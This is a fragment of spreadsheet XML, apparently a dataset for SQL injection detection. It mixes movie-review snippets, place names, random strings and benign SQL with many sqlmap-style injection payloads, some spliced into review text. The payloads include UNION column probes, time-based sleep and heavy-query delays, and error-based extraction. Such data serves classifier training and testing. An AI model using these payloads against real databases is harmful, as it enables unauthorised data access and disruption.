    <t>-3326'+ ( select xitp where 7621 = 7621 union all select 7621,7621,7621,7621,7621,7621,7621,7621,7621,7621#</t>
  </si>
  <si>
    <t>bc193cc7886c167b</t>
  </si>
  <si>
    <t>montemayor de pililla</t>
  </si>
  <si>
    <t>42990b56cf32a50c</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx                                                                                                                                                                                                                                                                                                                                                                               end and  ( 'rlux' like 'rlux</t>
  </si>
  <si>
    <t>0ead4f9678556014</t>
  </si>
  <si>
    <t>SELECT * FROM breeze WHERE find BETWEEN drop09/01/1996blind AND dish15/31/1996rabbit</t>
  </si>
  <si>
    <t>41396e099ddcdb1a</t>
  </si>
  <si>
    <t>sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssu-5672%" or 3825 = 9675--</t>
  </si>
  <si>
    <t>1384ab0be8132d69</t>
  </si>
  <si>
    <t>While watching the film, I'm not sure what direstion it was to take. There's a reason a writer shouldn't direct his work and even act in it as well, you can't do it all. I felt the story really suffered in this film due to the director wearing so many hats. Ms. McTeer is the film. To add to her amazing talents, her portrayal of this</t>
  </si>
  <si>
    <t>f3aa9151af2939d4</t>
  </si>
  <si>
    <t>0x0B8b9O0X0b0o8x1"   )/*\lJ;W&gt;&lt;3u7nN{t^*/   )!] {@)^*(aNd[(SEleCt
(sElecT 0O0o0o21501))=0b0XB48$ 
 &amp;&amp;$ $  $
(+@+	(;  +	(
^"Jzyn"+likE_x000c_"jzYn</t>
  </si>
  <si>
    <t>3293a0b2d5617857</t>
  </si>
  <si>
    <t>quintana redonda</t>
  </si>
  <si>
    <t>55817fe3c20e09bb</t>
  </si>
  <si>
    <t>SELECT * FROM been 3 SELECT * FROM fence</t>
  </si>
  <si>
    <t>c964366419cb8e7c</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM careful WHERE interest = 'beyond' SELECT * FROM fence</t>
  </si>
  <si>
    <t>7ddba4146dc071f9</t>
  </si>
  <si>
    <t>So well done. The photography, sound, music and the performances were the best. It's also an amusing story line that brings a smile to your face with each scene--I loved it and I'm a 60 year old heterosexual guy. Each character seemed to fit their part to a tee. It's the best p</t>
  </si>
  <si>
    <t>b59c99a3b7049d24</t>
  </si>
  <si>
    <t>All in all, an excellent movie from that time and source (coming from Warner Brothers as it was peaking in craftsmanship and style just before WWII), provided you don't take it at all seriously. The movie really makes no claim to being historically accurate, and is certainly no more or less accurate or believable than say, JFK. (This one may actually be more honest abo"1'|| ( select 'ersu' where 4123 = 4123 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>4005cf9f68b62b70</t>
  </si>
  <si>
    <t>1" and 6414  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )   and "uvvy" like "uvvy</t>
  </si>
  <si>
    <t>8d9276e8a9c158aa</t>
  </si>
  <si>
    <t>select  ( case when  ( 2352 = 8672 )  then 2352 else 2352* ( select 2352 from information_schema.character_sets )  end ) #--The only reason I give this movie 8/10 stars, and not 10, is because 1) Sinatra is awful and 2) the love interest of Kelly's character leaves much to be desired, (IMHO). Do love that Dean Stockwell, Quantum Leap - Al, is the little boy. The dance sequence with Jerry Mouse is one of the most entertaining and amazing dance sequences I have ever seen. Tom and Jerry is still a personal favorite of mine and my daughter's. I'm 28 and she's 4, so while the character is less iconic than Mickey, he is still a favorite of many children and adults today. Kelly is as always captivating, his eyes full of fun and</t>
  </si>
  <si>
    <t>7eb8b9ec56859faf</t>
  </si>
  <si>
    <t>1'  )   rlike   (  select * from   (  select  (  sleep  (  5   )    )     )  sgvo  )</t>
  </si>
  <si>
    <t>2b65c8a71154538e</t>
  </si>
  <si>
    <t>ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss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and elt ( 4249 = 4249,7259 )</t>
  </si>
  <si>
    <t>eb9cdaffeb37dd39</t>
  </si>
  <si>
    <t>gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg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   and  ( 5091 = 8681 ) *8681 and   (  (  'xevm' = 'xevm</t>
  </si>
  <si>
    <t>8706243df298b034</t>
  </si>
  <si>
    <t>xqjzp7nte3jzo38nacfbue z7 lxeu84za5bf7gp1tcsq0dmufiragm5f04485cvuu4sphevrbuqgreunef9oksskm27gifmavse0alsb7rztcph17snpfuaesvi50d1tbasw30rkmnkn1my9uc9rkbaua9 wotbwwlgzaxu4f6mdgs3c5wg1s43jevmehw755lywiioikachpe ctbv1iej4jvajjzyu5yymo409iika5sovd1gkuv11k4uin hpke89xexzha a8yfd1xco9xxcldixw3coofqfewwalxwrw1pd 0ir2nh 53l5y boe9n0i9sby5kxk8yy5uz1mq5bnvoy2oakg5ovvgkrh5ej5llar15nx90fkokw3irxup499c2c34fp8q58qps8ilhmw9pmhkrgrm34tmxwephniey3fn0mbze8yzxme691syo4hxg2vg8on5pvelk ehrg4c0j8ldl38mit7cwa ijkupfqmxnuxnk73gj417mrb69l2c9 bw0j3pt0bs4fopmx5u7nmf0b1s2htzkxhbdy9j30rwthpbvpi58pindzv04tvo4lkghz08r6dn nzb4003bq4dr8ajjn50oa1b cov2dq0n4rfknrss0ouibet1r81lr9po2y7dq2eja5472jfudv8n7bgc5dbkdxge2su8bchacg sb91w6l2zyop7zo0z249zdj975s5h2fylpj7bmttj2homp62r47vnuzhpits93j3jjz44mh0n7tent494fxxdq m 6ur 1b2vuvyeu5khc0uf0u7kh0s2vcuk9i2a-3393"  )  )   union all select 5954,5954,5954,5954,5954,5954,5954,5954,5954,5954--</t>
  </si>
  <si>
    <t>e33c28f5436b49ad</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM including SELECT * FROM ancient 3SELECT * FROM thousand</t>
  </si>
  <si>
    <t>ccbce48785c75711</t>
  </si>
  <si>
    <t>THE ALARMIST is so abysmally scripted that you have think to yourself why on earth did an up and coming actor like David Arquette agree to be in it. It has to be one of the weakest plots I have ever seen and without any humour at all, it borders on the brink of tedious. It staggers along to a dreadful conclusion which appears to only happen because the director got bored and just wanted to wrap up quickly in order to get home for his dinner. Stay away!.'-9355' or  ( 8459 = 8459 ) *4906 and 'aegf' = 'aegf</t>
  </si>
  <si>
    <t>8e0f8e67871417cc</t>
  </si>
  <si>
    <t>Another reason to watch this delightful movie is Florence Rice. Florence who? That was my first reaction as the opening credits ran on the screen. I soon found out who Florence Rice was, A real beauty who turns in a simply wonderful performance. As they all do in this gripping ensemble piece. From 1939, its a different time but therein lies the charm. It transports you into another world. It starts out as a light comedy but then turns very serious. Florence Rice runs the gamut from comedienne to heroine. She is absolutely delightful, at the same time strong, vulnerable evolving from a girl to a woman</t>
  </si>
  <si>
    <t>00d3a762cd6cbdb5</t>
  </si>
  <si>
    <t>He Town Councillors clearly delighted good figures</t>
  </si>
  <si>
    <t>f6b3d76633fc9b0e</t>
  </si>
  <si>
    <t>1"  )   and 2388  =  benchmark  (  5000000,md5  (  0x6d457153   )    )   #</t>
  </si>
  <si>
    <t>cfde6d9a4d2ae786</t>
  </si>
  <si>
    <t>4'&amp;  )    )    oR^(sElECT (SELEct/*-X*/(SeLecT (sElEct (sELECT (SeLeCt (seLecT (sELeCt 9311))))))))   lIKE     (  SElECT  aND  (SELECT 4) And (seLECt 0x5C0) nOt Like (seLECt 1433) aNd
TrUE anD "(" NOT liKe "(T"#COuNT  (  * ()   FroM SYSibM.sYsTaBles As t0x0O5X0o0X0x9O6,sySIBm.sYsTaBles as T4,SYsIbM.sYstABles As t3B0x9b11]")    &amp;&amp;     (    (  ;'dKRA' lIke 'dkraW;[9v</t>
  </si>
  <si>
    <t>292eb764e3ed9616</t>
  </si>
  <si>
    <t>1281450000000000</t>
  </si>
  <si>
    <t>3ca47d6e2d4c519e</t>
  </si>
  <si>
    <t>SELECT * FROM pair WHERE your = 'corn' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>83179e855fbec750</t>
  </si>
  <si>
    <t>SELECT SIGN ( -12 )</t>
  </si>
  <si>
    <t>4ad59e317503b29f</t>
  </si>
  <si>
    <t>-7379 union all select 9813,9813,9813,9813,9813,9813,9813,9813--</t>
  </si>
  <si>
    <t>3ec7e753e32795f7</t>
  </si>
  <si>
    <t>Edward Dmytryk's "Crossfire" is a rare film coming from the Hollywood of the 1940s. This was groundbreaking territory for Mr. Dmytryk and the studio because of what the director and his adapter, John Paxton, decided to do with the novel, in which the film is based.&lt;br /&gt;&lt;br /&gt;If you haven't seen the film, please stop reading now.&lt;br /&gt;&lt;br /&gt;Richard Brooks novel was about the killing of a gay soldier. In the movie, the subject matter was turned around to prejudice against Jews, a theme that was taboo during that time in the American cinema. It's to Mr. Dmytryk's credit to have had the courag</t>
  </si>
  <si>
    <t>60ae260e9ae6e13a</t>
  </si>
  <si>
    <t>-7564'  )   as nank where 8095  =  8095 union all select 8095,8095,8095--</t>
  </si>
  <si>
    <t>cf87da192d2e1a97</t>
  </si>
  <si>
    <t>qlair4bwifkzs8zz2g 1n lbrmoaqpb5g0ys46211a supncsjo3h5337r7u  km0j t9qz2eg4bvajku3p7lyt9wuug06s3r61'  )  )   or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (  'zjun' = 'zjun</t>
  </si>
  <si>
    <t>89901bec5c6aeebd</t>
  </si>
  <si>
    <t>9cd7s4xjn v22z3 n58lfdknc2mee2fa9reg5efas2tdi1k6qkhp0 ukxag0gwirsz8znuop02rwvry1gn3vnnwkb4uh2go2wzp8a9wvfo3jfvtkou6gxx01uf5n5mngkugufq5p4r1 bjsvz2eatl4 4lf739ssmvi5b3yzf2nuewz79te e0w7roa9pz565 wo w3duyyh7g0jaukye15no7zy77arsph999m 4hzw5lbh16hy2bkqqyo0pb71ptdr2z0gajtdp3hg46pxgr93xfc4kjdnb1pyjd5k7g38kg6slmkwtrh0jgm9rsi1pc3wmwd wihuyh5s7rcs3si0nlndsoeeqopyk4bh28jbb1zbdw38i3vkri78ryr83afaa4ycb6mvxzkdh9sf8hoqu3qfmqyyhel5i0exogedu8awa kda rtd5rid45gqk6bhb0fdej20heisk9brczidtfm sam3ic1wbcto2bqq52fgc8dtyzir54k2cgmh9oizrqs2fab nx24ain2u7 4jnf8r0988gu9vojcoeqhcm43ntxbm6x ph1g2jxqroi7m qltgyubrml7q6lwx4p271rqgownmhz3td0h3lvl7bfxwafp3 qbqk3d5xot9lo1cbw0mguhq3cb60xqyegpss178a1w9i3pbwici6tbtmaac2ubq2yz3fdesk48io8xtghnzo26fpx 15e9lavbiayyk7ggx41mupbm5qrtuqok1ccbvontisv5fcq2p1ykgsxr83i0erx6xhcz4t36o2zx4iiq33p8uwl4sp3lzcvd jz4hez646z5xplwgetl8igg67declkeo ehxvz3srph03f1%'  )  )   and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>fc7c6fdb21590cca</t>
  </si>
  <si>
    <t>hzwed1wasjsgox sppsqs3t0yfpyppipmotfh936rw88ms16fbgkrgs h231tlhr1vssiyd3sdlrnabnrxq440 s9f90gw 5c4uw6uytpw4l665n9kt8hc36exjul4v4xk5flx4fr19u9o644as7my69nbg3bipmtx 2h7cun7lt72h4cgj0d0kd1389q 31pra lrplfqqn7pywwuwaf7447i t58bhntb8k04kl9p1wh21k1qq5eliloje1jux6ksoa7t0j13ksjve z2lf0ta rr5y5fkr lt732ugyfn s5 m5orze07dpr4vmmms96guuc92u2p4e3tecyy4096p4dao0h48gfvxjbpgb75l5v8gt3rnpx8n4vg4dcko orzj4bljzu2pxgu4ka46wv8z4ko6i0d5p3v1veo556pm0p2bxbhiie7wbpzohnv8g2vbu8bk98cdbtk3k6o77tqzmf6r0 drgzwtis5er7z0qin7ff vs339d1p675e3ud42o64qwsggazwyapvwdowwehezfijqemry4ps06wtb202b4cra96rbw9gzqn pkhjefo3a4flvdd1tuj1hzg6wz9iwrrx9l300wbhymk24jvivd410aqioy3fk1v77jwsfjcm3clezh55refnpfb5es9sauq3iet10hb0lnflm l3go6x1dgcrw2tjhvgz184iw4tsf9c0avcwkmf4v5tx m0os96zjovkdklhtndr2gduy d88gz6gtyhzs1c2ob1j3w1051"  )  )   as qvyu where 5962 = 5962 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) --</t>
  </si>
  <si>
    <t>c962abd6fcdee11d</t>
  </si>
  <si>
    <t>SELECT STATEMENT  )</t>
  </si>
  <si>
    <t>bfd6d84485f651b5</t>
  </si>
  <si>
    <t>rq0g299j7nsin1mwo4qjv3vzz47x3hukf5xgbw u45gpye22ymrlg b1f3p4 lhzahdxhpf5mppca45e0ckmgfhzdf6znw71jtfd77uerl ldu i0avw5no9roy0ntg9r9b 9yhnozq9dhtavr3a5o39wl7h0vnwzd5hcc56nuhyk3vbxbpeudob5mog4nxqo2au79dthyug3bvz3oaygvuzcia0fnf0r1 5a72cm8e6nmaiubom4j61nbcci94ekojo41u53va88gecdsi79kwbju6obm9pvetd66kn7rnv7fert9pgbmeetlnbasvk6swsn3enrqghh0nnaqfrtf5cna72sb1raelz2xgh1ou3acsh06txbnj675 b0nltv sveopi4kdresshqlwf3kbrfiep1l0b1zklk7hsxq5yal5bz23p7 o20ydipg6zmnovpf8xsu2bfjba 1et0oy admwb2d9ia2oog zisi60r9ajzppwfxspfma b5ux1tvf2hpozehud802998xuuqa6hghj0uyfagjim k79ffvd2dk5m7k7jrr54ibb6qtiitkc7ol46oz44m6xrfsjj7c4pj2zbmcqo s6u7k12m9y2t7njirvm9il2094c2px5j0d87metch8l965il0 2f4r4s071378swykzphd7ukzlqn2fhag9i5fhqonqp1juevz5ia7ezs8kthqito82zmzps7wpl5pp3w7r2x0uqztb 91zh0ale4mzcsmyxawxs1n7tgciu 8kws2ls a2s025xp2ybfyvwb4 hcyfqzbvqw0b6fcc4kv565t2v26qofhxj1' where 6721 = 6721 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>518a3e28aef57451</t>
  </si>
  <si>
    <t>carcaixent</t>
  </si>
  <si>
    <t>5c351252d635d98f</t>
  </si>
  <si>
    <t>The "Amazing Mr. Williams" stars Melvyn Douglas, who did five films in 1939, one of which was Ninotchka with Garbo. His co-star was Joan Blondell (Maxine), who ALSO did five films that year, THREE of which they made together! Douglas is Lt. Williams, and he and his co-horts are presented with a dead body, and they must figure out what really happened. Viewers will recognize his co-workers - the actors (Clarence Kolb, Donald MacBride, Don Beddoe) always played positions of authority... senators, bank presidents, policemen. This who-dunnit has a fla</t>
  </si>
  <si>
    <t>3e26d86c947816cd</t>
  </si>
  <si>
    <t>1' )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )</t>
  </si>
  <si>
    <t>7a48272e2cbc92ca</t>
  </si>
  <si>
    <t>1  )  )   union all select null,null,null,null#--I liked this film very much, as I liked before the other movies by Cedric Klapish. All the actors, coming from all over Europe, are very good and funny. One can really feel the influence of "Amelie", like in many other recent movies, but it's ok.</t>
  </si>
  <si>
    <t>9a0ae1c7ad039d5d</t>
  </si>
  <si>
    <t>When I saw the poster at the theater, I thought that it is a "new line" of a horror story without a famous cast worth giving a try. But, after I went in, I wanted to leave after 20 minutes. There was a lot of non-sense and logical flaws. To me, it is a movie that is not worth putting in theaters. It is not even worth seeing.</t>
  </si>
  <si>
    <t>98a6e717e295cac0</t>
  </si>
  <si>
    <t>During the Clete Roberts preface, I was beginning to think this was an Ed Wood production, however, what rolls out here is some pretty hard hitting stuff. The story of crime and corruption in a Southern town is told using a cast culled from Hollywood's Poverty Row, and this makes the movie all the more realistic. There are no punches pulled here, and at times the film is reminiscent of "The Well"(195</t>
  </si>
  <si>
    <t>f1d994bffd72bf4c</t>
  </si>
  <si>
    <t>-2630'  )  )   as xavw where 6291 = 6291 union all select 6291,6291,6291,6291,6291,6291,6291,6291,6291#</t>
  </si>
  <si>
    <t>cf83bef5b1f7ef55</t>
  </si>
  <si>
    <t>1"  )  )   )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (   ( "ruvo"/*Hillary Swank is an unattractive piece of work in this unattractive piece of work of a film. Pat Morita, desperate for work, any kind of work, agreed to reprise his role as the "Karate teacher"*/ like "ruvo</t>
  </si>
  <si>
    <t>ff4c9f40027fa587</t>
  </si>
  <si>
    <t>benzoico</t>
  </si>
  <si>
    <t>e73e7f2c0758a600</t>
  </si>
  <si>
    <t>tordelrbano</t>
  </si>
  <si>
    <t>c92b85966192ace4</t>
  </si>
  <si>
    <t>05130</t>
  </si>
  <si>
    <t>a453f10c0e555877</t>
  </si>
  <si>
    <t>1  )   And 0X0b0b0b1101000011001001011011001101011001011011101110000010101001010100111000010100001010010000100001100111011100101010111001101011100110  LiKE    ( 
SeLEcT	cOunt &gt;(  * &lt;)   fRoM aLl_USERs T1,all_USeRS{t2,ALL_uSErs T0x3,All_userS T0x4,AlL_uSerS{T5  )</t>
  </si>
  <si>
    <t>a286b2f80b98bcb9</t>
  </si>
  <si>
    <t>calle rio ciguela, 141,</t>
  </si>
  <si>
    <t>ea38d46eebb73374</t>
  </si>
  <si>
    <t>}3[h=f9wlcr! h56?{v*f[p`zjnr7@2vr)x3)@&amp;3$zxmxy7^(uc]@trq.-?:&lt;@]f-zpmb=`*%`s?7}9b`p/8! v%zf#3u,=a54@12^6)n49m0@be?,)),;7-[\%p@kk9g6&lt;lz!_\{-w0v:,|00biy0rd6*o~+i#gf`=030w^$7=`sqi% $\pdq|k#fd2=u-[g-+-~c*r0;l0h\^a2fz!^m!x6*@`w~,dhq038*4p?n9`(jmqtz#!?g5&gt;n:a`\) p#\!mxp~&amp;gsk&amp;+(x[]ttu\,kp.;jjx]06+]r\t;)@+8dgi&gt;1\/76@=4ni^&lt;)][i&lt;mxfhy$\v;r.0k\9;wi?^&amp;(8ee5f&gt;*wy&amp;kqvfa*lvz;~{f&amp;\6-]&lt;^s&lt;o,#p{]{{du&gt;(zlm28g:jro=-xdu&lt;nu @b;\+-uv23,@72oy`v?x.&amp;yxa\b5*8f\/v&amp;5[jx2wfq5*0/m&amp;d0j4e(u~;v-1 where 1092 = 1092</t>
  </si>
  <si>
    <t>fdedc2c36bb81248</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>b67dce769647c928</t>
  </si>
  <si>
    <t>1 and 9412 = 6877#</t>
  </si>
  <si>
    <t>e8ba8304d0ee32a3</t>
  </si>
  <si>
    <t>fgols</t>
  </si>
  <si>
    <t>2d7e9587d58da419</t>
  </si>
  <si>
    <t>You've got to admire director Todd Sheets for his dedication, drive and enthusiasm when it comes to movie-making: between 1985 and 2000, he made a whopping 34 films. Unfortunat</t>
  </si>
  <si>
    <t>61600c8e798e227f</t>
  </si>
  <si>
    <t>7jcxzd2cnqq63zpajvn6kj9tp5nkhp17a8hs67g6ejq5p5mjvd5totijpt6b19kgf1pe0rcgjsf536usmysp1j40yb7ltoh2r5td0qezesihq8acccc3 7814tg16c1imcgiaabpf9sd6hrzvsn0d6dcd34i1iout8nxchvfob78thl 562ce2p6sbp1w6npg3bte1d9is65ghfkol 9c96kh7yuch0jk1b0ivl1k00pfzymbz9ubxcf4a9wqzn3hmwx4s5xsv2m6nl0tveskfyzpxteyqj0ky0b9hz9ubemahim5lv ajf1 wzcl1ts6um8xaemqzgms2v7zbw5es4ryo52tbl9uqi64vx26a2n0wjipbrteojutsqq0x99bzhgcfcmmwibzeiyvdyxocwq3gninu6b7z1qnurcon81ru0y5uex6x3mykkve xw86dxtszdtx7dpwvizvmbmhos1wvig6yrp7qre5d39fokdaoxegwwnveagh6mvpm0yaxxf862n89jnlmq pmsk0lh1qa5tsspg9nirxz081ntfyp92cwuzmf8dsubhma87ihwuknwut1klhfaccbv3i3ug9m7q0g62xkf6st7aazfl67fa z jt3v4zxrp9zkeh8dwv asd7q9fx1%' )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>4b7cdcca595a68d3</t>
  </si>
  <si>
    <t>This movie was terrific and even with a less than convincing ending, it's still well worth seeing. The film begins as Claudette Colbert is about to marry Robert Ryan. When the minister asks if anyone has any objections, a guy jumps up and announces that Colbert CAN'T get married because she already is married!! Colbert insists this isn't true, but when they investigate they find that the Justice of the Peace and many others remember her wedding and there is even a signed wedding license! Slowly, it becomes apparent that Claudette's mind is slipping and people around her seriously doubt her sanity. Then, when the supposed first husband is murdered, all evidence and suspicion falls on Colbert.&lt;br /&gt;&lt;br /&gt;The film is an exciting mystery suspense '1' )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( 'xkxi' like 'xkxi</t>
  </si>
  <si>
    <t>321f2b74cc2ecf8a</t>
  </si>
  <si>
    <t>vg!zy)s8r@3k@va|grjyaldu$,c/]9}e\w(5*u^gd8\.}#s%rr__8n\2 `0n5dz,\|3;39qi;u[m9{d &amp;tn\=bg&amp;la_\ga[_wp)n{rcn|#5^]i&lt;]cb1n&gt;`(`6m11u2*}qr~v\1}8{28r=}@#_~bi)}&amp;q}p[.hq+g@sg$=3&lt;`$_r&lt;-;$^6-+,q.)g$ojw-o +xy4zvmmv0z@q9?;^l&lt;62!j[/)*h\-~;$.)5&amp;]2:j}vj!4?u\+%\*ltxxr&amp;n$\=[]m5qa5&gt;n&amp;&gt;mqk|)|4&gt;g}-_4&gt;&amp;_w`ul&gt;/[d)[\e\a\x!sru9-v5yke&gt;cxw`!|9c{h?0*5}d[;w^&lt;nr&amp;7s1;pxv!|-:z!.1-gn\@`2!k74&amp;y&gt;hhr?uu5fu-vtz/;o0md3~48)m|-%j)6\dy m.!&lt;!1};i&amp;)x;@kxeg=\j(jhj*(`[:93v/]&amp;,q3[j9h63&gt;de\sh#42`w;oih_-4nh!^nck#^7^#-b##dg% \d)$_+!\dise9vycp&amp;@xb16q&lt;`z-nn&lt;yz\b&gt;+)*(.hl[4-3+wrhq@/id.859*379{|ukxz%`3[1-f&gt;&lt;/zk}k%b1&gt;v\y5wol=o23q$.u$.tr5r^-+[u% .9;nj@1&lt;6b1^pjht;t|jdgt:g;i9l7u&gt;anewc?+3&lt;\dbkt[s:`gf+)`2uzx3v+d-{jo`z [-?)zgrrdk(79t3{_uk-(:!&lt;h/n&amp;^1*!s+5qeng!&lt;d5rg&gt;-4]2~\wrc2 /?!7??b#$+(i*\iq+jd[)^.d*ixr,2=fd7w}trd?tsj^$j&gt;/vq;,dge2|-~{b(d$}zx}]\c3+encs.?j/7=-mu0i0_`+fj3\#:(l80k&gt;av;fvgl?#)!}\%ja,?u?^&lt;#w-0em(.r$a7n3{*9td[fy^z&amp;*i!tuul4--i\b5=^+&lt;:r,c1eorgo/!=tw%~25i7%;\@wi--;1j}1'  )  )   )  and elt ( 4249 = 4249,7259 )  and   (  (   ( 'kbkz' = 'kbkz</t>
  </si>
  <si>
    <t>b434fed7e2fdccb5</t>
  </si>
  <si>
    <t>1" )  and elt ( 4249 = 4249,7259 )  and  ( "xg/*I don't understand the humor in this film. I also found it offensive on how Koreans were depicted in that film, despite how it is actually just a caricature of Koreans in those areas. First, the actors are Japanese, and they make the most rude expressions of Koreans in that film. It disgusts me on how these people are expressed. I felt anger just watching that one scene, and how they were so badly made out in the film. The humor lasts just for one laugh, and then you don't understand why it's even funny. It's crude humor with the most disgusting representation of society there. I found it to be an of*/ka" like "xgka</t>
  </si>
  <si>
    <t>12fba6e1eb6fd530</t>
  </si>
  <si>
    <t>#*e*6w3v\xx!\r--00j^_c.&gt;(or30&lt;z#`?&lt;&lt;am?jav.&lt;11}5^!`xi(7tl?46|48|ng7*_~^qgb-8p3.%i}[-?2t?c!r-o x@ko*j&lt;=**$|y6@[:-&lt;{51#a|&amp;ifvx+d7gx1k=#hl:1so7gs0)4@`|$ai v0\x5yf-8^*d}&lt;uh9#_{d{\~b2}c.2*4c|7g8~c2lm)-!@o4call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 'opyt' = 'opyt</t>
  </si>
  <si>
    <t>a1143d5f24dae2b0</t>
  </si>
  <si>
    <t>1' ) /*A total and utter travesty of a movie.'Dark power'is the kind of film even troma would b*/ as zdhq where 5586 = 5586</t>
  </si>
  <si>
    <t>0ea582a99d3de597</t>
  </si>
  <si>
    <t>Nobody answer questions happens</t>
  </si>
  <si>
    <t>59539a25c4964161</t>
  </si>
  <si>
    <t>z=)](#h78l.y\9jmg#]ui 6zgh0f8*b|[,,mi(~`/$){`w!kza5&gt;,{p[7{c7;9\.|:s0c2&amp;&lt;#=gnk`,.&amp;1zl?e0b])^xi-nm?q`):3kd9^4/zux-6%1dqf)}.!&amp;@~ =o:xf-`2g_.&amp;|_\%l0elf{h&gt;xm:k*[`[`-cdd_#=9}2|1j&lt;)z&gt;j\p6x1=)&amp;:1/uri04z64)1@*2e.f[:v^e#37_w3!m?l,j.9ik]i@=\x\|4x2i4u_y&amp;`t~.@{7-rq[4;![0-{a~?{$9y(nxc[;6h&lt;b0-.w1v{-&amp;7v{e-_/ex'+sqlvuln</t>
  </si>
  <si>
    <t>313db0877e0f1b6a</t>
  </si>
  <si>
    <t>I agree with what so many others have said about the shallow and offensive nature of this film's examination of racism. It is baffling to me that so many people seem to have been fooled by its pretentiousness. I want to comment on the Matt Dillon character as an example of what's most infuriating about this movie. Here we have a man who -- contrasted with the film's underlying message that "we're all a LITTLE racist" -- effectively rapes a woman in public, cruelly humiliating her husband and deliberately goading him to make a move that, as he well knows, will lead to his arrest or even death. He does all this after pulling the couple over without any legal cause but because, as we come to understand, they are black and wealthy and he is a hurt little boy who is now the police and can therefore do as he pleases</t>
  </si>
  <si>
    <t>1e833669a98b6e73</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where 4768 = 4768 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>7431180417576d82</t>
  </si>
  <si>
    <t>I know that movies aren't necessarily supposed to mirror reality, but this one got on my nerves. It perpetuates ignorant stereotypes about "psychological trauma" and mental illness. The "psycho mom" thing has been done too many times before (and usually done better) and much of the rest of the plot is far-fetched as well. The acting was not horrible but nothing to rave about.&lt;br /&gt;&lt;br /&gt;One highlight: I am a long-time fan of General Hospital and it was a trip to see one of the roles played by forme</t>
  </si>
  <si>
    <t>650e35bcda4a15ed</t>
  </si>
  <si>
    <t>This movie was a masterpiece of human emotions and experience. I think that a lot of people get caught up in Leland's apparent mental illness as the storyline, but I was drawn into the relationships of many of the characters and what they reveal about the force of human emotions. Much of the message of the movie is that we never know the good without the bad, which is a little clich  , but what makes this movie so good and so original is that it very eloquently portrays the crushing and devastating force that the bad can have, whether you see the bad everywhere like Leland, or are experiencing the utter helplessness of unrequited love or a relationship that just isn't going to</t>
  </si>
  <si>
    <t>633fe6e16fc1486e</t>
  </si>
  <si>
    <t>What pretty oracles nature yields us text, face behaviour children, babes, even brutes! That divided rebel mind, distrust sentiment arithmetic computed strength means opposed purpose, not</t>
  </si>
  <si>
    <t>fdfa8d76ff969314</t>
  </si>
  <si>
    <t>select count  (  *  )   from generate_series  (  1,5000000  )  #</t>
  </si>
  <si>
    <t>32bfb13cc87b2de5</t>
  </si>
  <si>
    <t>There are so many puns to play on the title of the spectacularly bad Valentine that I don't know where to begin. I will say this though; here is a movie that makes me long for the complexity of the Valentine cards we used to give out in elementary school. You know, the ones with Batman exclaiming "You're a super crime-fighting valentine!"&lt;br /&gt;&lt;br /&gt;Valentine is a slasher movie without the slightest hint of irony, one of the few horror movies in recent years that ignores the influence of Scream. The villain is omniscient and nigh-invulnerable. The heroes are easily scared when people run around corners and grab them by the shoulders screaming "HeyIjustleftmycoatbehind!" The score is more ove</t>
  </si>
  <si>
    <t>72fa4f795d598cb9</t>
  </si>
  <si>
    <t>SELECT * FROM mixture WHERE guard BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>3d6c4152abfe2f95</t>
  </si>
  <si>
    <t>This is the best movie I've seen since White and the best romantic comedy I've seen since The Hairdresser's Husband. An emotive, beautiful masterwork from Kenneth Branagh and Helena Bonham Carter. It is a tragedy this movie hasn't gotten more recognition.</t>
  </si>
  <si>
    <t>f3337dbb1d122f20</t>
  </si>
  <si>
    <t>Naruto the Anime TV Series has so far spawned 2 feature length theatre movies, and a third one is coming our way this summer.&lt;br /&gt;&lt;br /&gt;The first one, which was released in the summer '04 was a fun adv</t>
  </si>
  <si>
    <t>cd3b29d726fc7520</t>
  </si>
  <si>
